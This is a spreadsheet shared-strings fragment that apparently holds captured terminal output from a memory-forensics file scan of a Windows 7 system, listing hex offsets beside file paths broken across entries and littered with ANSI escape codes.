  <si>
    <t>0x5141f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-WindowsMediaPlayer-Troubleshooters-Package~31bf3</t>
  </si>
  <si>
    <t>856ad364e35~x</t>
  </si>
  <si>
    <t>86~~6.1.760</t>
  </si>
  <si>
    <t>1.1751</t>
  </si>
  <si>
    <t>4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0x5142038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ntshrui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>_x001B_[2A_x001B_[103G</t>
  </si>
  <si>
    <t>0x514ec38</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft-windows-i..rnational-timezones_31bf3856ad364e35_6.1.7601.24290_n</t>
  </si>
  <si>
    <t>one_177d90b48</t>
  </si>
  <si>
    <t>1369c2b\tzu</t>
  </si>
  <si>
    <t>pd.exe</t>
  </si>
  <si>
    <t>0x514ef80</t>
  </si>
  <si>
    <t>\Windows\System32\netsh.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0x5152108</t>
  </si>
  <si>
    <t>\Windows\Fonts\meiryob.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0x51521c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\win32k.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51523a0</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoeui.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0x5152458</t>
  </si>
  <si>
    <t>\Windows\Fonts\msyhbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0x5152cb0</t>
  </si>
  <si>
    <t>\Windows\Fonts\micross.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0x5152d68</t>
  </si>
  <si>
    <t>\Windows\Fonts\batang.ttc_x001B_[0K</t>
  </si>
  <si>
    <t>0x5173c00</t>
  </si>
  <si>
    <t>\Windows\System32\sxssrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x5177a28</t>
  </si>
  <si>
    <t>\Windows\System32\tsddd.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x5177b60</t>
  </si>
  <si>
    <t>\Windows\Fonts\cga80woa.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0x517f9a0</t>
  </si>
  <si>
    <t>\System Volume Information\{35539446-42d2-11e9-ba55-08002710b8d0}{3808876b-c176-4e48-b7ae-0404</t>
  </si>
  <si>
    <t>6e6cc752}_x001B_[0K</t>
  </si>
  <si>
    <t>0x51834e0</t>
  </si>
  <si>
    <t>\Windows\Fonts\ega80woa.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0x51838a0</t>
  </si>
  <si>
    <t>\Windows\Fonts\kokilabi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0x5183958</t>
  </si>
  <si>
    <t>\Windows\System32\wship6.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x5183a10</t>
  </si>
  <si>
    <t>\Windows\System32\wininit.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0x518fe20</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx007.inf_x86_neutral_6d0bcfb01c9e96a5\prnlx00</t>
  </si>
  <si>
    <t>7.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0x5193028</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\monitor.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0x5197038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wmerror.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51987e0</t>
  </si>
  <si>
    <t>\Windows\System32\webservices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x5198b38</t>
  </si>
  <si>
    <t>\Windows\System32\es.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x5199b40</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.Directory</t>
  </si>
  <si>
    <t>Services.dll_x001B_</t>
  </si>
  <si>
    <t>[0K</t>
  </si>
  <si>
    <t>0x519b570</t>
  </si>
  <si>
    <t>\Windows\System32\wuapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x519c100</t>
  </si>
  <si>
    <t>\$Directory_x001B_[0K</t>
  </si>
  <si>
    <t>0x519c6a8</t>
  </si>
  <si>
    <t>0x519c7d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\XamlBuildTask\v4.0_4.0.0.0__31bf3856ad364e35\XamlBuil</t>
  </si>
  <si>
    <t>dTask.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x519ca68</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Workflow.Activities\3.0.0.0__31bf3856ad364e35\System.Workflo</t>
  </si>
  <si>
    <t>w.Activities.</t>
  </si>
  <si>
    <t>dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x519cd38</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Workflow.ComponentModel\3.0.0.0__31bf3856ad364e35\System.Wor</t>
  </si>
  <si>
    <t>kflow.Compone</t>
  </si>
  <si>
    <t>ntModel.dll</t>
  </si>
  <si>
    <t>0x519cdf0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.tlb_x001B_[0K</t>
  </si>
  <si>
    <t>0x519d478</t>
  </si>
  <si>
    <t>0x519d778</t>
  </si>
  <si>
    <t>0x519e4f8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\NaturalLanguage6.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x519e830</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationHost_v0400.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x519ee58</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\Performance\WmiApRpl.hew.h_x001B_[0K</t>
  </si>
  <si>
    <t>0x519f6a8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_dvd_pcat_de3c62295de3e26e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>_x001B_[1A_x001B_[66G</t>
  </si>
  <si>
    <t>0x519f760</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x519fc48</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A9E4F776657345B52012CE8E27</t>
  </si>
  <si>
    <t>9D314C_373B9C</t>
  </si>
  <si>
    <t>0CE2E036AF9</t>
  </si>
  <si>
    <t>6D2622</t>
  </si>
  <si>
    <t>856FE9D9B_x001B_[0K</t>
  </si>
  <si>
    <t>0x519fd00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1F85.tmp\System.Runtime.Serialization.For</t>
  </si>
  <si>
    <t>matters.Soap.</t>
  </si>
  <si>
    <t>0x519ff80</t>
  </si>
  <si>
    <t>0x51a0128</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.</t>
  </si>
  <si>
    <t>0x51a0250</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\System.Data.Oracle</t>
  </si>
  <si>
    <t>Client.dll_x001B_[0</t>
  </si>
  <si>
    <t>K</t>
  </si>
  <si>
    <t>0x51a0550</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Design\2.0.0.0__b03f5f7f11d50a3a\System.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a0608</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\S</t>
  </si>
  <si>
    <t>ystem.Configu</t>
  </si>
  <si>
    <t>ration.dll_x001B_</t>
  </si>
  <si>
    <t>0x51a06c0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Cor</t>
  </si>
  <si>
    <t>e.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a0da0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11</t>
  </si>
  <si>
    <t>d50a3a\System</t>
  </si>
  <si>
    <t>.Configurat</t>
  </si>
  <si>
    <t>ion.In</t>
  </si>
  <si>
    <t>stall.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a0e58</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a11a0</t>
  </si>
  <si>
    <t>\Windows\rescache\rc0004\Segment1.toc_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a1388</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e</t>
  </si>
  <si>
    <t>855142bd5705d</t>
  </si>
  <si>
    <t>0x51a1480</t>
  </si>
  <si>
    <t>\Windows\System32\RacEngn.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a1728</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a1d58</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.7601.24356_none_6</t>
  </si>
  <si>
    <t>cb64e55070781</t>
  </si>
  <si>
    <t>ff.manifest</t>
  </si>
  <si>
    <t>0x51a2448</t>
  </si>
  <si>
    <t>\Windows\System32\cscui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a2738</t>
  </si>
  <si>
    <t>\Endpoint_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a2a48</t>
  </si>
  <si>
    <t>\Windows\System32\cscdll.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a37b0</t>
  </si>
  <si>
    <t>\Windows\System32\keymgr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a3868</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a</t>
  </si>
  <si>
    <t>\Microsoft.Vi</t>
  </si>
  <si>
    <t>sualBasic.d</t>
  </si>
  <si>
    <t>ll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a3e90</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\User Account Pictures\user.bmp_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a4b18</t>
  </si>
  <si>
    <t>\Windows\System32\msvcr120_clr0400.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a5ec8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiProxy\3d702846eda8eb8ad76f_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a5f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sstpsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a65f0</t>
  </si>
  <si>
    <t>0x51a67b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\en-US\ServiceModelEvents.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a6970</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelEvents.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a6a28</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\provsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a6d10</t>
  </si>
  <si>
    <t>0x51a7390</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\TaskScheduler\6.1.0.0__31bf3856ad364e35\TaskScheduler.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a78f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml.Serialization\v4.0_4.0.0.0__b77a5c561934e0</t>
  </si>
  <si>
    <t>89\System.Xml</t>
  </si>
  <si>
    <t>.Serializat</t>
  </si>
  <si>
    <t>ion.dl</t>
  </si>
  <si>
    <t>l_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a7f18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System</t>
  </si>
  <si>
    <t>.Xml.Linq.dll</t>
  </si>
  <si>
    <t>0x51a8ba8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\PeerDistSh.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a8f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP579E.tmp\System.Web.RegularExpressions.dl</t>
  </si>
  <si>
    <t>0x51a9200</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netlogon.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a9480</t>
  </si>
  <si>
    <t>\Windows\System32\sstpsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51a9a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec</t>
  </si>
  <si>
    <t>86b8d6858ec0b</t>
  </si>
  <si>
    <t>c\comctl32.</t>
  </si>
  <si>
    <t>dll_x001B_[0</t>
  </si>
  <si>
    <t>0x51a9f80</t>
  </si>
  <si>
    <t>\Windows\System32\provsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51aa350</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationFramework.Classic\3.0.0.0__31bf3856ad364e35\Presentatio</t>
  </si>
  <si>
    <t>nFramework.Cl</t>
  </si>
  <si>
    <t>assic.dll_x001B_[</t>
  </si>
  <si>
    <t>0K</t>
  </si>
  <si>
    <t>0x51aa840</t>
  </si>
  <si>
    <t>\Windows\System32\fundisc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51abda8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\shell32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51ade60</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb_x001B_[0K</t>
  </si>
  <si>
    <t>0x51adf18</t>
  </si>
  <si>
    <t>\Windows\System32\wscinterop.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51ae328</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\mcstoredb\9515cc84cfe17f2bdd10_x001B_[0K</t>
  </si>
  <si>
    <t>0x51ae428</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\f8420d8c6ede777377fc_x001B_[0K</t>
  </si>
  <si>
    <t>0x51ae598</t>
  </si>
  <si>
    <t>\Windows\System32_x001B_[0K</t>
  </si>
  <si>
    <t>0x51ae7d0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\PEAuth.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0x51af0e8</t>
  </si>
  <si>
    <t>\Windows\System32\spp\plugin-manifests-signed\sppobjs-spp-plugin-manifest-signed.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0x51af1a0</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\prod_WMPPlayer.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0x51af458</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\profsvc.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0x51af708</t>
  </si>
  <si>
    <t>\Windows\System32\AdvancedInstallers\cmiv2.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51afa30</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\NlaSvc.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0x51afb58</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\prod_Audio-AudioCore.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0x51aff80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\nlasvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b0270</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Microsoft-Windows-WLANConnectionFlow.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b0740</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\Microsoft-Windows-TabletPC-InputPanel-Events.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b0ac0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pnidui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b0c70</t>
  </si>
  <si>
    <t>\Windows\System32\pnidui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b0e78</t>
  </si>
  <si>
    <t>0x51b2038</t>
  </si>
  <si>
    <t>\cygwin-25f71ff67fa0e143-1600-sigwait_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b23c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netcfg.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b26c8</t>
  </si>
  <si>
    <t>\Windows\AppPatch\AcLayers.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b2780</t>
  </si>
  <si>
    <t>\Windows\System32\wuauclt.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b2ac0</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\passwd_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b4240</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\svchost.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b42f8</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\t</t>
  </si>
  <si>
    <t>okens.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b61a0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A</t>
  </si>
  <si>
    <t>49B151_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b6d20</t>
  </si>
  <si>
    <t>\Windows\System32\certprop.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b8448</t>
  </si>
  <si>
    <t>\Windows\Fonts\vgaoem.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b8500</t>
  </si>
  <si>
    <t>\Windows\Fonts\dosapp.fon_x001B_[0K_x001B_[1G</t>
  </si>
  <si>
    <t>0x51b87f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dhcpcore.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b88a8</t>
  </si>
  <si>
    <t>\Windows\Fonts\cga40woa.fon_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b8b40</t>
  </si>
  <si>
    <t>\Windows\AppPatch\drvmain.sdb_x001B_[0K</t>
  </si>
  <si>
    <t>0x51b9148</t>
  </si>
  <si>
    <t>0x51b9e10</t>
  </si>
  <si>
    <t>\Windows\System32\RpcRtRemote.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bb450</t>
  </si>
  <si>
    <t>\Windows\ehome\malgunmc.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bc140</t>
  </si>
  <si>
    <t>\Windows\System32\winspool.drv_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bc2e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wlansvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bc8c8</t>
  </si>
  <si>
    <t>\Windows\System32\WinSCard.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bc980</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\certprop.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bd258</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\HealthCenterCPLInstrumentation.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bd510</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ncsi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bd6f8</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\ErrorReportingConsole.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bd8f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\napipsec.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0x51bdf80</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\perftrack\DriverFrameworks-UserMode.ptxml_x001B_[0K</t>
  </si>
  <si>
    <t>0xb34f3b8_x001B_[0K_x001B_[1</t>
  </si>
  <si>
    <t>7G</t>
  </si>
  <si>
    <t>0x7ff49202_x001B_[0K_x001B_[</t>
  </si>
  <si>
    <t>17G</t>
  </si>
  <si>
    <t>0xde400330</t>
  </si>
  <si>
    <t>\Users\Support\Links\Desktop.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4003e8</t>
  </si>
  <si>
    <t>\Users\Public\Desktop\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde400a40</t>
  </si>
  <si>
    <t>0xde401720</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2621440_SP1~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde401a50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2479943~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde401b08</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2621440~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde401c30</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB2698365~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde401f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2698365_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde402a08</t>
  </si>
  <si>
    <t>0xde4030f0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\5</t>
  </si>
  <si>
    <t>b35c2[1].woff</t>
  </si>
  <si>
    <t>0xde4038a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_237_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde403960</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_38_for_KB3071756~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4041d0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Temp\wmsetup.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xde404390</t>
  </si>
  <si>
    <t>\Windows\System32\msg711.acm_x001B_[0K</t>
  </si>
  <si>
    <t>0xde404820</t>
  </si>
  <si>
    <t>\Windows\System32\wscui.cpl_x001B_[0K</t>
  </si>
  <si>
    <t>0xde404940</t>
  </si>
  <si>
    <t>\Windows\System32\mfplat.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde405a40</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde405f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3109560_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde407618</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_341_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde407b00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MobilePC-Client-Sensors-Package~31bf3856ad364e35</t>
  </si>
  <si>
    <t>~x86~en-US~6.</t>
  </si>
  <si>
    <t>1.7601.1751</t>
  </si>
  <si>
    <t>4.mum_x001B_</t>
  </si>
  <si>
    <t>0xde407bb8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4081d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_39_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4085b8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB2773072~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde408948</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MobilePC-Client-SideShow-Package~31bf3856ad364e3</t>
  </si>
  <si>
    <t>5~x86~en-US~6</t>
  </si>
  <si>
    <t>.1.7601.175</t>
  </si>
  <si>
    <t>14.mum</t>
  </si>
  <si>
    <t>0xde408a68</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ParentalControls-Package~31bf3856ad364e35~x86~en</t>
  </si>
  <si>
    <t>-US~6.1.7600.</t>
  </si>
  <si>
    <t>16385.mum_x001B_[</t>
  </si>
  <si>
    <t>0xde408d98</t>
  </si>
  <si>
    <t>0.1638</t>
  </si>
  <si>
    <t>5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde408e50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ParentalControls-Package~31bf3856ad364e35~x86~~6</t>
  </si>
  <si>
    <t>.1.7600.16385</t>
  </si>
  <si>
    <t>.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde40aec8</t>
  </si>
  <si>
    <t>\Windows\System32\msutb.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde40b4a0</t>
  </si>
  <si>
    <t>\Windows\System32\dwm.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde40bc10</t>
  </si>
  <si>
    <t>\Windows\Logs\CBS\CbsPersist_20190310120909.cab_x001B_[0K</t>
  </si>
  <si>
    <t>0xde40c328</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-MediaPlayback-OC-Package~31bf3856ad364e35~x86~en</t>
  </si>
  <si>
    <t>0xde40c3e0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3110329_SP1~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde40c710</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde40c7c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde40ff80</t>
  </si>
  <si>
    <t>\Windows\Logs\CBS\CBS.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xde411f80</t>
  </si>
  <si>
    <t>\Windows\System32\rdpendp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde412038</t>
  </si>
  <si>
    <t>\Windows\System32\LogonUI.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde412160</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IIS-WebServer-AddOn-2-Package~31bf3856ad364e35~x</t>
  </si>
  <si>
    <t>86~~6.1.7600.</t>
  </si>
  <si>
    <t>0xde4135d8</t>
  </si>
  <si>
    <t>\Windows\System32\Microsoft\Protect\S-1-5-18\cd705a80-b525-4b55-8bf4-14c9cdcf1f5a_x001B_[0K</t>
  </si>
  <si>
    <t>0xde413950</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\LIBEAY32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde414dc0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\c</t>
  </si>
  <si>
    <t>olorbox[1].cs</t>
  </si>
  <si>
    <t>s_x001B_[0K</t>
  </si>
  <si>
    <t>0xde415530</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_71_for_KB3060716~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde4158a0</t>
  </si>
  <si>
    <t>\Windows\System32\makecab.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde415c10</t>
  </si>
  <si>
    <t>0xde415ec8</t>
  </si>
  <si>
